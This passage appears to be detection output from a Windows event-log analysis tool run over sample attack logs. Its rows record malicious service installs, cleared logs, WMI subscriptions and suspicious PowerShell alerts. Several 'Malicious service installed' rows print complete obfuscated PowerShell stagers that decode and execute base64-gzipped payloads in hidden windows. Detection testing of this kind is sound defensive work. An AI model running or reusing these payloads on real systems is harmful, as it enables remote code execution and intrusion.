FXbDHkqte9z9rwabpd9a+2x1e9bbt3SPs11fVwYdYOyCezGJ2vTSvTtTw2r1v4jCaYgYqgZs8LVeDh0ZyK3c4jSNk+dCt5yQMCIP2Bg0wVTpijDtxi3i+v6FHHTvHBIq2D8OL0osjRfrhqDw3jvTVzc0IoEL9JNrOt0jgi2musL0oFOD2L2zLBTjv209Y4cudnK6WixtIwtPJHuywhxLXVsaf96In1Pp/WUyKego/7ptYfH73G+ubmC3k0vP/Yvj5xR+x/McMDDEV4GnBzcTIsV3+hohEOSffGUmaQBde8sQffncrcd6GL5B/AQG25GNvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 05:59:41.659 +09:00,IE10Win7,7045,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 05:59:41.676 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 05:59:41.680 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 05:59:41.854 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 06:23:37.125 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: aCshIvAdgRYNApEv : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAFhX4FcCA71WbW/aSBD+nEr9D1aFhK06GAgpTaRKZwMGEkwAB/NWVG3stVlYvMRe89brf78x2Alpm1PuTjoL5N2dmZ3ZZ57ZsRv5NifMF8JS5PbH1o4I39+/O+ugAC0FMbMqtL2NLGR2YRiRzXLtDD3p7AwUMkHppjMozUbl/lr4IogTdbWqsiUi/vT6uhIFAfb5cZ6rY66GIV4+UIJDURL+FAYzHODzu4c5trnwXch8y9Upe0A0UdtVkD3DwrnqO7GsxWwUh5gzV5RwMfv1a1aanBemudpjhGgoZs1dyPEy51CalYQfUuzwfrfCYtYgdsBC5vLcgPgXxVzfD5GL27DbGhuYz5gTZiU4DPwCzKPAF06PFe9z1BKzMOwEzFYdJ8AhGOWa/potsJjxI0pl4Q9xkgTRi3xOlhjkHAdsZeJgTWwc5hrIdyjuYXcqtvEmPftbjcRTI9Dq8ECSIT2vR2swJ6L4uEFW+jXeY2YleH7KLuDx4/279+/clBjOPuw442HxlBcwOpscxhgiFjssJAfdL0JeFgxwijgLdjDN3AcRlqbCJE7IZDoFX/rF2Kk5V/pwKb++TSG1AQu/uPs8tIdG+I2CZGIx4kzBMklcZlbuGfH66wSsYpf4uLrz0ZLYKcfE3+UBuxQfTp1L1doQm5hNBNipYoo9xGNIZWHyq1ltSfiTrRYR6uBAtSGXIUQFaZZeBnPMkpht+gZeAmLHeRZS4gKzcaqdsHmXeo/noJStUBSGstCJoLRsWTAxotiRBdUPSSJSI84Ow+xzuEZEObFRyNPtplKKY+KvwvyQB5ENSYSz35srbBNEYyhkoUEcrO1M4qV+s78FooIoJb4HO60hEbASA2DymBqBI7+ggZQzMW8uVxQvQfVQ6jpFHhR2UhcHSiEPO9mfA00Jf2R3DEmKxUmYkGeTMi4LFgk43BgxvCec+k/BnNwch7AqAU7yI6aFNNF2PKZ+Jrpc9Kxi+T4mawLYAZ6AAzR6wJYaCvGnkskDAE78oNyRigrPqOlTw9YWpKBuSKFpwL9PLpqsWnZub+YNJahuZ67aDJtGo1PtNhql9Y1plbhZa/LbTpMbteF8bqqNXn/Ex021cU/yi1Fpv7ohe7OlOqOt8mmv7Td5bbufe447qrquV3bNXuFSJ61Bpavli6hVrUWtgbbR8qWwRjaNLul3Fzc6fxhZFPVdxRsWrhDZtoK5VWDGvqmq9dmFvb9xrfrMcHajhnI1KC3UmqpW/Jqla+x2pAVqR7GQZ7HN7bxOB15F1XSb4HG3r2vdrq6p/fr8sXqleGA7RDNtYBXJeDXszWCuQwi3Sr7UdPCejboAUp2pyOuBjlcp2jMXdKofVe1jm4VFtNCYqoGOPn6EuEYrvUNBft8vMtWi7SFSW+OdriiFUaekNvJkUPfUeEvkaV2khuvqvqoULIc5g8v2yFWsIS0r1cr9ynYVRdk0qrf2uLD9fFcuafnHypIs6UPRUa76nzV/c+t11p7THZR72/buAfz1FcX6EPMGiJPxN4WCfdcr07vo4oQTrzUDAwXhDFHgClzvaenqLNCTi7rDSGwhis+dfIEDH1NofNAaU/arlDI7bh5P9zo0r2NLmUIl92F4UfztSBKeFKXnjpIuXV+PIVwoppTmuRb2PT6T89uLfB7aQn5bysPR337MClvtxKft5Li1vMDs1Bc9+JLiess8eI+PtUrzf4A0qfYZvJy3QPq89jfSN8Gcl19C8Yv45cI/wv3fYTFAhIO6CXcXxce2+jokCaFOvkuSpAFb3OSJPxTvIn7ehi+WvwCZDrcJpgoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 06:23:37.125 +09:00,IE10Win7,7045,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 06:23:37.132 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 06:23:37.135 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 06:23:37.348 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 07:30:41.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 07:30:41.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 09:11:22.985 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:11:22.985 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:11:52.496 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:11:52.496 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:14:19.540 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:14:19.540 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:20:41.106 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:20:41.106 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:20:56.173 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:20:56.173 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 12:38:31.282 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 12:38:31.282 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 21:48:41.553 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 21:48:41.553 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 22:07:21.937 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 22:07:43.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-20 22:07:44.086 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 22:07:44.086 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 22:09:46.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-20 22:09:46.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-20 22:11:15.816 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 22:11:15.816 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 22:11:15.816 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 22:11:15.816 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 22:11:15.832 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 23:21:12.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 23:21:12.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-21 01:33:53.404 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-21 01:34:04.272 +09:00,IE10Win7,104,high,System log file was cleared,User: IEUser,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx +2016-09-21 01:35:46.590 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: UWdKhYTIQWWJxHfx : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAGFl4VcCA71WW4/aOhB+bqX+h6hCIlFZEli6N6nScYAAy2Vhw52iI5M4weDEbOJw6+l/PxMge2m31Z4+nAgU2zPjGX/zjSdO5FuCcl+aF8YW77iE9KRvH96/a+MAe5Kcmq0rV5uutY5mopKRUq6rcU625Yd6V3n3DvRS++uRJ32R5AlarUrcw9Sf3twUoyAgvjjOsxUiUBgSb8YoCWVF+kcazElAzu5mC2IJ6ZuU+jtbYXyG2UltV8TWnEhnyLdjWYNbOI4xa64YFXL669e0MjnLTbPlhwizUE6bu1AQL2szllak70rssLtbETndpFbAQ+6I7ID65/lszw+xQ1qw25o0iZhzO0wrcAr4BUREgS8dzhNvcBTLaRi2A24h2w5ICNrZmr/mSyKn/IixjPSXPDl5v498QT0CckECvjJJsKYWCbNV7NuM3BNnKrfIJjn0W43k50ag1RaBkoG8vBJmk9sRI0fLtPJzoC9yqcDzQz4BiO8f3n947ySU8C6CVWtPLxcbhJ+TAkbvJocxgajlNg/pQf+LpGWkJvjHggc7mKa6QUSUqTSJszGZTqWUPeyagdjVM7/eI5cYgPreEMM1h8VJn1N7CkanbKUs9hB7+A3rSsShPintfOxRKyGW/FoOiMPI4cTZRK0FYcnpk4DYJcKIi0WMakaa/GxW9qh4tNUjymwSIAvyGEJUkGLlZTDHRMnpmt8kHiB1nKchHQ7QmSTaJwrvEu/xHJTSRYbDMCO1I6gnKyOZBDNiZyTkh/QkQpHgh2H6KdxmxAS1cCiS7aZKguPJX5H7oQgiC5IHZ++aK2JRzGIoMlKV2kTfmdRN/KZfBaKIGaO+CzutIRGwEgNgipgSAYT4mH4laxJR81aMeKB3KG6DYRdK+VQQBx5hl9jpH6NMCH9kd4xHAsSzGCHJJuMiI/VpIOCOiLE9cunPg3h2RxzCKQbklBQ5qZyJvhMxz1MMF+dHfp4wOiASCEDDCLin45BcFEwRAFbyR/WOFhE8o5rPmpa+pDm0oblaE/49el7jpUu7fruoqkFpO3dQLaw1q+1Sp1otrG/NfkGY5Zqot2uiWR4uFiaq3vdGYlxD1S7VlqPCfnVL92YD2aOterHX9xtN3+4Xru2MSo7jXjrmfe6zQRuDYkfX8rhRKkeNgb7RtUJYpptqh/Y6y1tDzEZ9hnuO6g5z15huG8Gin+PNfQ2hyvzc2t86/cq8ae9GVfV6UFiiMkJFv9w3dF4f6QFqq33s9vmmvqiwgVtEumFRMu70DL3TMXTUqyweSteqC7ZDPNcH/Twdr4b3c5gbEEJd1Qo1m+z5qAMgVTjC7j3ouMW8NXdAp/QJ6Z9aPMzjpc6RDjrG+AHiGq2MNgN5t5fnqM9aQ4wa452hqrlRu4CqGh1UXBRviV29g1G4Lu1Laq5vc3vwuTVy1P6QXaqlYndlOaqqbqqlujXOba/uLgu69lD0qMdmeVu97l3p/qbutteu3Rlc3m9buxn466lq/2PMGqBNavHZu9IuF8/o8Ktrv4mDcI4Z0ATu86RQDR4Ypyu5zWlsIcvPuvWSBD5h0Nyg/SV8R4xxK+4TL65w6FXHDjKF4u3B8Dz/6kiRHhWVpz6SLN3cjCFmqKMjybMN4rtintG255oG97+2LWhw8LeftMhXO/m0WSbuIAleTy7YwYUSl1hqMdg0L5bV1f+B5qnE5/Cy34rm09pvpG9CWMs8IvGT5OXCf8L7D7EYYCpA34Qri5FjA/09JCcuPfsQSVIHXHFOT/wxeBeJsxZ8o/wLs66tlosKAAA=''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx +2016-09-21 01:35:46.590 +09:00,IE10Win7,7045,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx +2016-09-21 01:35:46.605 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-21 01:35:46.608 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-21 01:35:46.790 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-21 03:27:25.424 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-21 03:45:16.455 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-21 03:45:24.408 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-21 03:45:24.408 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-21 03:45:48.501 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-21 03:45:48.501 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-21 04:15:32.581 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-21 04:15:54.128 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Generic,,rules/sigma/deprecated/powershell_suspicious_invocation_generic.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-21 04:19:26.903 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Generic,,rules/sigma/deprecated/powershell_suspicious_invocation_generic.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-21 12:40:37.088 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx +2016-09-21 12:40:41.865 +09:00,IE10Win7,104,high,System log file was cleared,User: IEUser,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx +2017-06-10 04:21:26.968 +09:00,2016dc.hqcorp.local,4794,high,Password Change on Directory Service Restore Mode (DSRM) Account,,rules/sigma/builtin/security/win_susp_dsrm_password_change.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/4794_DSRM_password_change_t1098.evtx +2017-06-13 08:39:43.512 +09:00,2012r2srv.maincorp.local,4765,medium,Addition of SID History to Active Directory Object,,rules/sigma/builtin/security/win_susp_add_sid_history.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4765_sidhistory_add_t1178.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:18:01.084 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 04:12:28.360 +09:00,SEC511,4104,high,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/powershell_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 04:15:23.660 +09:00,SEC511,4104,high,Accessing WinAPI in 